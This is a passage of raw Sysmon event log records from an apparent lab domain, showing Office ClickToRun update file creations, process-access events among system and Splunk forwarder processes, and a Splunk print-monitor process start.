Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000063633Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\Csi.dll2021-04-20 14:54:00.409 11241100x800000000000000063632Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.409{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\adal.dll2021-04-20 14:54:00.409 11241100x800000000000000063631Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.331{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEWDAT.DLL2021-04-20 14:54:00.331 11241100x800000000000000063630Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.315{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ACEEXCL.DLL2021-04-20 14:54:00.315 11241100x800000000000000063629Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.300{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Wordcnv.dll2021-04-20 14:54:00.300 11241100x800000000000000063628Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.269{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\react-native-win32.dll2021-04-20 14:54:00.269 11241100x800000000000000063627Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.159{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PROOF\msgrammar8.dll2021-04-20 14:54:00.159 11241100x800000000000000063626Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.159{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PPINTL.COMMON.DLL2021-04-20 14:54:00.159 11241100x800000000000000063625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localEXE2021-04-20 14:54:00.144{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PDFREFLOW.EXE2021-04-20 14:54:00.144 11241100x800000000000000063624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.065{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\libeay32.dll2021-04-20 14:54:00.065 11241100x800000000000000063623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.019{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\NL7Data0011.DLL2021-04-20 14:54:00.019 11241100x800000000000000063622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7tk.dll2021-04-20 14:54:00.003 11241100x800000000000000063621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:00.003{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\mset7tkjp.dll2021-04-20 14:54:00.003 10341000x800000000000000049442Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB08-607E-D306-00000000BB01}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049441Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049440Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049439Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049438Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049437Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049436Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049435Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049434Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049433Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049432Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EB08-607E-D306-00000000BB01}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049431Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB08-607E-D306-00000000BB01}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049430Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.212{85C0FFC9-EB08-607E-D306-00000000BB01}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049429Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:00.024{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=988598D6A5A0FCD12292BDAB9F3055A7,SHA256=CB5199EC71055B49D79A30A7F8589B7FDBDDE6AB5D1E2B05DE2CAFFBFF2521F2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000063748Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.769{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\msolap.dll2021-04-20 14:54:01.769 11241100x800000000000000063747Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.737{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\msolui.dll2021-04-20 14:54:01.737 11241100x800000000000000063746Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\xmsrv.dll2021-04-20 14:54:01.565 11241100x800000000000000063745Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.581{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-synch-l1-2-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063744Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l1-2-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063743Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-file-l2-1-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063742Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-processthreads-l1-1-1.dll2021-04-20 14:54:01.565 11241100x800000000000000063741Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-timezone-l1-1-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063740Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-localization-l1-2-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063739Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-core-xstate-l2-1-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063738Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-conio-l1-1-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063737Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-multibyte-l1-1-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063736Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-private-l1-1-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063735Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\api-ms-win-crt-process-l1-1-0.dll2021-04-20 14:54:01.565 11241100x800000000000000063734Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\AccessMessageDismissal.txt2021-04-20 14:54:01.565 11241100x800000000000000063733Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:54:01.565{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DocumentFormat.OpenXml.dll2021-04-20 14:54:01.565 